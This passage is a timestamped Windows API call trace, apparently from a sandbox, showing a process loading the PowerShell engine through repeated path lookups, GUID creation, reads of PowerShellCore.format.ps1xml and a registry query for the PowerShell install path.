	[0527.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.654] VirtualQuery (in: lpAddress=0xeb080, lpBuffer=0xebf40, dwLength=0x30 | out: lpBuffer=0xebf40*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0527.655] VirtualQuery (in: lpAddress=0xeb110, lpBuffer=0xebfd0, dwLength=0x30 | out: lpBuffer=0xebfd0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0527.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.656] VirtualQuery (in: lpAddress=0xeb890, lpBuffer=0xec750, dwLength=0x30 | out: lpBuffer=0xec750*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0527.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.658] VirtualQuery (in: lpAddress=0xeb890, lpBuffer=0xec750, dwLength=0x30 | out: lpBuffer=0xec750*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0527.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0527.660] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xdb8a7a42, Data2=0xb517, Data3=0x4893, Data4=([0]=0x99, [1]=0xa3, [2]=0x82, [3]=0x5d, [4]=0x6, [5]=0xde, [6]=0x9d, [7]=0xee))) returned 0x0
	[0527.662] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xcb7b1075, Data2=0x1627, Data3=0x4661, Data4=([0]=0xa3, [1]=0xe8, [2]=0x93, [3]=0xde, [4]=0xb5, [5]=0xd1, [6]=0xae, [7]=0xf7))) returned 0x0
	[0527.662] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xb9a9b8ec, Data2=0xe028, Data3=0x4e26, Data4=([0]=0x8b, [1]=0xae, [2]=0x98, [3]=0xb9, [4]=0xa1, [5]=0x5d, [6]=0x62, [7]=0xf0))) returned 0x0
	[0528.582] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x549c2292, Data2=0xaea4, Data3=0x42cb, Data4=([0]=0xb0, [1]=0x20, [2]=0x61, [3]=0xa1, [4]=0x62, [5]=0x71, [6]=0x43, [7]=0x7d))) returned 0x0
	[0528.583] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x3a7bcf8b, Data2=0xb59, Data3=0x422a, Data4=([0]=0xa6, [1]=0x6e, [2]=0x84, [3]=0x7f, [4]=0x3d, [5]=0xa1, [6]=0xce, [7]=0x2))) returned 0x0
	[0528.583] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xc40f2476, Data2=0x7945, Data3=0x4769, Data4=([0]=0xb2, [1]=0x66, [2]=0xf5, [3]=0xff, [4]=0x35, [5]=0xe9, [6]=0x4d, [7]=0xa5))) returned 0x0
	[0528.583] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xa13ad213, Data2=0xd745, Data3=0x4d2f, Data4=([0]=0x97, [1]=0x6, [2]=0xeb, [3]=0x1f, [4]=0xf8, [5]=0x2a, [6]=0xc7, [7]=0x52))) returned 0x0
	[0528.584] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x16815836, Data2=0xd611, Data3=0x4865, Data4=([0]=0xbf, [1]=0xa2, [2]=0x3f, [3]=0xbd, [4]=0xe6, [5]=0x1d, [6]=0xc4, [7]=0x9a))) returned 0x0
	[0528.584] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x76f0cd7, Data2=0x4759, Data3=0x4535, Data4=([0]=0x92, [1]=0x80, [2]=0x7b, [3]=0xe7, [4]=0x5e, [5]=0x95, [6]=0x60, [7]=0x96))) returned 0x0
	[0528.584] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x6bf5f703, Data2=0x96aa, Data3=0x4d89, Data4=([0]=0x9c, [1]=0xee, [2]=0xe5, [3]=0x53, [4]=0x81, [5]=0x76, [6]=0xce, [7]=0x87))) returned 0x0
	[0528.584] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x2d01bf20, Data2=0x1e1a, Data3=0x401b, Data4=([0]=0xb8, [1]=0xfe, [2]=0x30, [3]=0xfc, [4]=0xc6, [5]=0xba, [6]=0xe6, [7]=0x9c))) returned 0x0
	[0528.584] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x6ad1caa3, Data2=0xf571, Data3=0x41ed, Data4=([0]=0x95, [1]=0x5b, [2]=0x55, [3]=0xab, [4]=0xa2, [5]=0x2d, [6]=0x9d, [7]=0x70))) returned 0x0
	[0528.586] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xd09015eb, Data2=0x6ce7, Data3=0x4a93, Data4=([0]=0xae, [1]=0x15, [2]=0xe1, [3]=0x8e, [4]=0xd2, [5]=0xa6, [6]=0x5e, [7]=0x16))) returned 0x0
	[0528.587] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xb784b843, Data2=0xa617, Data3=0x41ca, Data4=([0]=0xbf, [1]=0x1a, [2]=0x21, [3]=0x18, [4]=0x5b, [5]=0xc, [6]=0xa8, [7]=0x5))) returned 0x0
	[0528.587] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xcdde1eb3, Data2=0x4b3b, Data3=0x48bb, Data4=([0]=0xb4, [1]=0x74, [2]=0xd6, [3]=0xd1, [4]=0xda, [5]=0x5, [6]=0x51, [7]=0x55))) returned 0x0
	[0528.587] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xadfd29dc, Data2=0x6a3d, Data3=0x44ad, Data4=([0]=0xaa, [1]=0x71, [2]=0x50, [3]=0xb3, [4]=0x87, [5]=0x2b, [6]=0xd, [7]=0x44))) returned 0x0
	[0528.588] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xcaa44669, Data2=0x127c, Data3=0x41f3, Data4=([0]=0x8d, [1]=0x1a, [2]=0xec, [3]=0xbc, [4]=0xb9, [5]=0xf8, [6]=0xfb, [7]=0xfc))) returned 0x0
	[0528.588] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x532092c0, Data2=0x4462, Data3=0x4a62, Data4=([0]=0xa2, [1]=0xf3, [2]=0x4f, [3]=0xfb, [4]=0xfa, [5]=0x38, [6]=0x50, [7]=0xbf))) returned 0x0
	[0528.588] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x25d6150e, Data2=0x278c, Data3=0x4fba, Data4=([0]=0xbd, [1]=0xf, [2]=0xe6, [3]=0x6c, [4]=0x14, [5]=0xef, [6]=0x3f, [7]=0x85))) returned 0x0
	[0528.588] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x62954c90, Data2=0x4c78, Data3=0x43ce, Data4=([0]=0x9c, [1]=0xf8, [2]=0x5c, [3]=0x72, [4]=0xf4, [5]=0x4e, [6]=0x21, [7]=0x7a))) returned 0x0
	[0528.588] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x7fe4d8a4, Data2=0x8c9b, Data3=0x44c6, Data4=([0]=0xb8, [1]=0xea, [2]=0x5b, [3]=0xa9, [4]=0x28, [5]=0x34, [6]=0xe9, [7]=0x2c))) returned 0x0
	[0528.589] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x435bf6fb, Data2=0x716f, Data3=0x4a41, Data4=([0]=0x8a, [1]=0x93, [2]=0xdb, [3]=0x6b, [4]=0x26, [5]=0xfe, [6]=0xb3, [7]=0x3a))) returned 0x0
	[0528.589] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0528.589] GetFileType (hFile=0x320) returned 0x1
	[0528.589] SetErrorMode (uMode=0x1) returned 0x1
	[0528.589] GetFileType (hFile=0x320) returned 0x1
	[0528.589] ReadFile (in: hFile=0x320, lpBuffer=0x2ff54d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ff54d0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.590] ReadFile (in: hFile=0x320, lpBuffer=0x2ff54d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ff54d0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.590] ReadFile (in: hFile=0x320, lpBuffer=0x2ff54d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ff54d0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.590] ReadFile (in: hFile=0x320, lpBuffer=0x2ff54d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ff54d0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.590] ReadFile (in: hFile=0x320, lpBuffer=0x2ff54d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ff54d0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.591] ReadFile (in: hFile=0x320, lpBuffer=0x2ff54d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ff54d0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.591] ReadFile (in: hFile=0x320, lpBuffer=0x2ff54d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ff54d0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.591] ReadFile (in: hFile=0x320, lpBuffer=0x2ff54d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ff54d0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.591] ReadFile (in: hFile=0x320, lpBuffer=0x2ff54d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ff54d0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.592] ReadFile (in: hFile=0x320, lpBuffer=0x2ff54d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ff54d0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.592] ReadFile (in: hFile=0x320, lpBuffer=0x2ff54d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ff54d0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.593] ReadFile (in: hFile=0x320, lpBuffer=0x2ff54d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ff54d0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.593] ReadFile (in: hFile=0x320, lpBuffer=0x2ff54d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ff54d0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.594] ReadFile (in: hFile=0x320, lpBuffer=0x2ff54d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ff54d0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.594] ReadFile (in: hFile=0x320, lpBuffer=0x2ff54d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ff54d0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.594] ReadFile (in: hFile=0x320, lpBuffer=0x2ff54d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ff54d0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.594] ReadFile (in: hFile=0x320, lpBuffer=0x2ff54d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ff54d0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.596] ReadFile (in: hFile=0x320, lpBuffer=0x2ff54d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ff54d0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.596] ReadFile (in: hFile=0x320, lpBuffer=0x2ff54d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ff54d0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.596] ReadFile (in: hFile=0x320, lpBuffer=0x2ff54d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ff54d0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.597] ReadFile (in: hFile=0x320, lpBuffer=0x2ff54d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ff54d0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.597] ReadFile (in: hFile=0x320, lpBuffer=0x2ff54d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ff54d0*, lpNumberOfBytesRead=0xecdb8*=0xe67, lpOverlapped=0x0) returned 1
	[0528.597] ReadFile (in: hFile=0x320, lpBuffer=0x2ff4a9f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ff4a9f*, lpNumberOfBytesRead=0xecdb8*=0x0, lpOverlapped=0x0) returned 1
	[0528.597] ReadFile (in: hFile=0x320, lpBuffer=0x2ff54d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ff54d0*, lpNumberOfBytesRead=0xecdb8*=0x0, lpOverlapped=0x0) returned 1
	[0528.598] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xece48 | out: phkResult=0xece48*=0x320) returned 0x0
	[0528.598] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecdcc, lpData=0x0, lpcbData=0xecdc8*=0x0 | out: lpType=0xecdcc*=0x1, lpData=0x0, lpcbData=0xecdc8*=0x56) returned 0x0
	[0528.598] CoTaskMemAlloc (cb=0x5a) returned 0x32ca00
	[0528.598] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecd9c, lpData=0x32ca00, lpcbData=0xecd98*=0x56 | out: lpType=0xecd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xecd98*=0x56) returned 0x0
	[0528.598] CoTaskMemFree (pv=0x32ca00) 
	[0528.598] RegCloseKey (hKey=0x320) returned 0x0
	[0528.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0528.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xec940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0528.600] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xfda3541c, Data2=0x19bc, Data3=0x4684, Data4=([0]=0xb1, [1]=0x4f, [2]=0x62, [3]=0xaf, [4]=0xaa, [5]=0x39, [6]=0x43, [7]=0x5b))) returned 0x0
	[0528.600] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xaa371cf4, Data2=0xb6a5, Data3=0x4c09, Data4=([0]=0x8d, [1]=0x5a, [2]=0xa0, [3]=0x36, [4]=0xfb, [5]=0xdf, [6]=0x87, [7]=0xda))) returned 0x0
	[0528.600] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xb01085c7, Data2=0xe8d, Data3=0x463b, Data4=([0]=0xaf, [1]=0x3b, [2]=0x39, [3]=0x79, [4]=0x74, [5]=0xf, [6]=0xc2, [7]=0xb5))) returned 0x0
	[0528.600] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x20b81e36, Data2=0xcd02, Data3=0x4b21, Data4=([0]=0xb2, [1]=0x4f, [2]=0x7f, [3]=0xb8, [4]=0x65, [5]=0x2, [6]=0x65, [7]=0xee))) returned 0x0
	[0528.600] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x22c0a2d, Data2=0x751a, Data3=0x42ca, Data4=([0]=0x96, [1]=0xcc, [2]=0x6c, [3]=0xb8, [4]=0x19, [5]=0x6b, [6]=0x22, [7]=0x27))) returned 0x0
